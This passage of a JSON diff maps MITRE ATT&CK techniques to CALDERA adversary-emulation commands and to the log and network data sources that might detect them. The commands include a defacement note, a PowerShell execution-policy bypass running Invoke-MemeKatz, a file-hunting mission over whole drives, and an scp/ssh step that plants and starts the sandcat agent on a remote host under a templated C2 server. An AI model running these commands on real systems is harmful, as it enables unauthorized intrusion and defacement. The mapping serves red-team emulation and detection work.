netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1491", + "command_list": [ + "echo \"proof that this machine was hacked.\" > message.txt\n", + "Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'\n", + ".\\Invoke-MemeKatz.ps1\n", + "powershell.exe -ep bypass -c \"Invoke-MemeKatz.ps1\"\n" + ], + "commands": [ + { + "command": "echo \"proof that this machine was hacked.\" > message.txt\n", + "source": "data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml", + "name": "Create a text file for the user to find" + }, + { + "command": "Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'\n", + "source": 
"data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml", + "name": "Create a text file for the user to find" + }, + { + "command": ".\\Invoke-MemeKatz.ps1\n", + "source": "data/abilities/impact/68235976-2404-42a8-9105-68230cfef562.yml", + "name": "Downloads random meme and sets as desktop background" + }, + { + "command": "powershell.exe -ep bypass -c \"Invoke-MemeKatz.ps1\"\n", + "source": "data/abilities/impact/68235976-2404-42a8-9105-68230cfef562.yml", + "name": "Downloads random meme and sets as desktop background" + } + ], + "parsed_datasets": [ + { + "id": "47d08617-5ce1-424a-8cc5-c9c978ce6bf9", + "name": "Leave note", + "description": "Create a text file for the user to find", + "tactic": "impact", + "technique": { + "attack_id": "T1491", + "name": "Defacement" + }, + "platforms": { + "darwin": { + "sh": { + "command": "echo \"proof that this machine was hacked.\" > message.txt\n" + } + }, + "linux": { + "sh": { + "command": "echo \"proof that this machine was hacked.\" > message.txt\n" + } + }, + "windows": { + "psh": { + "command": "Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'\n" + } + } + } + }, + { + "id": "68235976-2404-42a8-9105-68230cfef562", + "name": "Invoke-MemeKatz", + "description": "Downloads random meme and sets as desktop background", + "tactic": "impact", + "technique": { + "attack_id": "T1491", + "name": "Defacement" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": ".\\Invoke-MemeKatz.ps1\n", + "payloads": [ + "Invoke-MemeKatz.ps1" + ] + }, + "cmd": { + "command": "powershell.exe -ep bypass -c \"Invoke-MemeKatz.ps1\"\n", + "payloads": [ + "Invoke-MemeKatz.ps1" + ] + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1565.001", + "command_list": [ + "./mission.go -duration 60 -extension .caldera -dir '/'", + "copy mission.go mission.exe &&mission.exe -duration 60 -extension .caldera -dir C:\\", + "mv mission.go mission.exe;.\\mission.exe -duration 60 -extension .caldera -dir 'C:\\';" + ], + "commands": [ + { + "command": "./mission.go -duration 60 -extension .caldera 
-dir '/'", + "source": "data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml", + "name": "Hunts for files of a certain extension and inserts a message" + }, + { + "command": "copy mission.go mission.exe &&mission.exe -duration 60 -extension .caldera -dir C:\\", + "source": "data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml", + "name": "Hunts for files of a certain extension and inserts a message" + }, + { + "command": "mv mission.go mission.exe;.\\mission.exe -duration 60 -extension .caldera -dir 'C:\\';", + "source": "data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml", + "name": "Hunts for files of a certain extension and inserts a message" + } + ], + "parsed_datasets": [ + { + "description": "Hunts for files of a certain extension and inserts a message", + "id": "55f9600a-756f-496b-b27f-682052dc429c", + "name": "File Hunter Mission", + "platforms": { + "darwin": { + "sh": { + "command": "./mission.go -duration 60 -extension .caldera -dir '/'", + "payloads": [ + "mission.go" + ] + } + }, + "linux": { + "sh": { + "command": "./mission.go -duration 60 -extension .caldera -dir '/'", + "payloads": [ + "mission.go" + ] + } + }, + "windows": { + "cmd": { + "command": "copy mission.go mission.exe &&mission.exe -duration 60 -extension .caldera -dir C:\\", + "payloads": [ + "mission.go" + ] + }, + "psh": { + "command": "mv mission.go mission.exe;.\\mission.exe -duration 60 -extension .caldera -dir 'C:\\';", + "payloads": [ + "mission.go" + ] + } + } + }, + "tactic": "impact", + "technique": { + "attack_id": "T1565.001", + "name": "Data Manipulation: Stored Data Manipulation" + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1021.004", + "command_list": [ + "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n", + "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server 
#{server} -group red 1>/dev/null 2>/dev/null &'\n" + ], + "commands": [ + { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n", + "source": "data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml", + "name": "Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication" + }, + { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n", + "source": "data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml", + "name": "Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication" + } + ], + "parsed_datasets": [ + { + "id": "10a9d979-e342-418a-a9b0-002c483e0fa6", + "name": "Start 54ndc47", + "description": "Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.004", + "name": "Remote Services: SSH" + }, + "platforms": { + "darwin": { + "sh": { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n", + "cleanup": "ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'\n", + "payloads": [ + 
"sandcat.go-darwin" + ] + } + }, + "linux": { + "sh": { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n", + "cleanup": "ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'\n", + "payloads": [ + "sandcat.go-linux" + ] + } + } + }, + "singleton": true + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network 
traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + 